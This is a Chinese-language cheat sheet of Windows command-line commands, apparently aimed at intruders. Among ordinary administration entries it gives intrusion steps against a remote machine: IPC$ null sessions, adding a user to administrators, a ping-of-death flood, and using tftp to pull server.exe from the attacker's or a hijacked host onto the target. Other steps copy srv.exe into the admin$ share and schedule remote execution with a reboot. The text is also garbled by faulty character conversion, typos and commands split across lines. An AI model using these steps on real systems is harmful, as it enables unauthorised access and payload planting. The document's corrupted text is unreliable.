net use " " /user:" " 建立ipc空連結
net
use "密碼" /user:"使用者名" 建立ipc非空連結
use h: "密碼" /user:"使用者名" 直接登陸後映射對方c:到本地為h:
net use h: 登陸後映射對方c:到本地為h:
net use /del 删除ipc連結
net use h: /del
删除映射對方到本地的為h:的映射
net user 使用者名 密碼 /add 建立使用者
net user guest /active:yes
激活guest使用者
net user 檢視有哪些使用者
net user 帳戶名 檢視帳戶的屬性
net localgroup
administrators 使用者名 /add 把"使用者"添加到管理者中使其具有管理者權限,注意:administrator後加s用複數
start 檢視開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time \\目标ip 檢視對方時間
net time \\目标ip /set
設定本地計算機時間與"目标ip"主機的時間同步,加上參數/yes可取消确認資訊
net view 檢視本地區域網路内開啟了哪些共享
view 檢視對方區域網路内開啟了哪些共享
net config 顯示系統網絡設定
net logoff 斷開連接配接的共享
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 區域網路内正在使用的網絡連接配接類型和資訊
net share 檢視本地開啟的共享
net share ipc$
開啟ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除c:共享
user guest 12345 用guest使用者登陸後用将密碼改為12345
net password 密碼 更改系統登陸密碼
netstat
-a 檢視開啟了哪些端口,常用netstat -an
netstat -n 檢視端口的網絡連接配接情況,常用netstat -an
-v 檢視正在進行的工作
netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況(檢視tcp/ip協定使用情況)
netstat -s 檢視正在使用的所有協定使用情況
nbtstat -a ip
對方136到139其中一個端口開了的話,就可檢視對方最近登陸的使用者名(03前的為使用者名)-注意:參數-a要大寫
tracert -參數
ip(或計算機名) 跟蹤路由(資料包),參數:"-w數字"用于設定逾時間隔。
ping ip(或域名)
向對方主機發送預設大小為32位元組的資料,參數:"-l[空格]資料包大小";"-n發送資料次數";"-t"指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大于64k的檔案并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows
nt及xp(windows 95 98)檢視本地ip位址,ipconfig可用參數"/all"顯示全部配置資訊
tlist -t
以樹行清單顯示程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的support/tools檔案夾内)
kill -f 程序名
加-f參數後強制結束某程序(為系統的附加工具,預設是沒有安裝的,在安裝目錄的support/tools檔案夾内)
del -f 檔案名
加-f參數後就可删除隻讀檔案,/ar、/ah、/as、/aa分别表示删除隻讀、隐藏、系統、存檔檔案,/a-r、/a-h、/a-s、/a-a表示删除除隻讀、隐藏、系統、存檔以外的檔案。例如"del/ar
*.*"表示删除目前目錄下所有隻讀檔案,"del/a-s *.*"表示删除目前目錄下除系統檔案以外的所有檔案
#2 二:
del /s /q 目錄 或用:rmdir /s /q 目錄 /s删除目錄及目錄下的所有子目錄和檔案。同時使用參數/q
可取消删除操作時的系統确認就直接删除。(二個指令作用相同)
move 盤符\路徑\要移動的檔案名 存放移動檔案的路徑\移動後檔案名
移動檔案,用參數/y将取消确認移動目錄存在相同檔案的提示就直接覆寫
fc one.txt two.txt > 3st.txt
對比二個檔案并把不同之處輸出到3st.txt檔案中,"> "和"> >" 是重定向指令
at id号 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要确認就直接停止
at id号 /delete 停止某個已注冊的計劃任務
at 檢視所有的計劃任務
at time 程式名(或一個指令) /r
在某時間運作對方某程式并重新啟動計算機
finger username @host 檢視最近有哪些使用者登陸
telnet ip 端口
遠和登陸伺服器,預設端口為23
open ip 連接配接到ip(屬telnet登陸後的指令)
telnet 在本機上直接鍵入telnet
将進入本機的telnet
copy 路徑\檔案名1 路徑\檔案名2 /y
複制檔案1到指定的目錄為檔案2,用參數/y就同時取消确認你要改寫一份現存目錄檔案
copy c:\srv.exe
複制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的檔案,注:2st.txt檔案頭要空三排,參數:/b指二進制檔案,/a指ascll格式檔案
copy c:\
或:copy\\ip\admin$\*.* 複制對方admini$共享下的srv.exe檔案(所有檔案)至本地c:
xcopy
要複制的檔案或目錄樹 目标位址\目錄名 複制檔案和目錄樹,用參數/y将不提示覆寫相同檔案
tftp -i 自己ip(用肉機作跳闆時這用肉機ip) get
server.exe c:\server.exe 登陸後,将"ip"的server.exe下載下傳到目标主機c:\server.exe
參數:-i指以二進制模式傳送,如傳送exe檔案時用,如不加-i 則以ascii模式(傳送文本檔案模式)進行傳送
tftp -i 對方ip put
c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 端口
用于上傳檔案至伺服器或進行檔案操作,預設端口為21。bin指用二進制方式傳送(可執行檔案進);預設為ascii格式傳送(文本檔案時)
route
print 顯示出ip路由,将主要顯示網絡位址network addres,子網路遮罩netmask,網關位址gateway
addres,接口位址interface
arp 檢視和處理arp緩存,arp是名字解析的意思,負責把一個ip解析成一個實體性的mac位址。arp
-a将顯示出全部資訊
start 程式名或指令 /max 或/min 新開一個新視窗并最大化(最小化)運作某程式或指令
mem
檢視cpu使用情況
attrib 檔案名(目錄名) 檢視某檔案(目錄)的屬性
attrib 檔案名 -a -r -s -h 或 +a +r +s
+h 去掉(添加)某檔案的 存檔,隻讀,系統,隐藏 屬性;用+則是添加為某屬性
dir
檢視檔案,參數:/q顯示檔案及目錄屬系統哪個使用者,/t:c顯示檔案建立時間,/t:a顯示檔案上次被通路時間,/t:w上次被修改時間
date /t 、
time /t 使用此參數即"date/t"、"time/t"将隻顯示目前日期和時間,而不必輸入新日期和時間
set
指定環境變量名稱=要指派給變量的字元 設定環境變量
set 顯示目前所有的環境變量
set p(或其它字元)
顯示出目前以字元p(或其它字元)開頭的所有環境變量
pause 暫停批處理程式,并顯示出:請按任意鍵繼續....
if
在批處理程式中執行條件處理(更多說明見if指令及變量)
goto 标簽
将cmd.exe導向到批處理程式中帶标簽的行(标簽必須單獨一行,且以冒号打頭,例如:":start"标簽)
call 路徑\批處理檔案名
從批處理程式中調用另一個批處理程式 (更多說明見call /?)
for 對一組檔案中的每一個檔案執行某個特定指令(更多說明見for指令及變量)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示目前echo設定
echo 資訊 在螢幕上顯示出資訊
echo
資訊 >> pass.txt 将"資訊"儲存到pass.txt檔案中
findstr "hello" aa.txt
在aa.txt檔案中尋找字元串hello
find 檔案名 查找某檔案
title 标題名字 更改cmd視窗标題名字
color 顔色值
設定cmd控制台前景和背景顔色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、a=淡綠、b=淡淺綠、c=淡紅、d=淡紫、e=淡黃、f=亮白
prompt 名稱 更改cmd.exe的顯示的指令提示符(把c:\、d:\統一改為:entsky\ )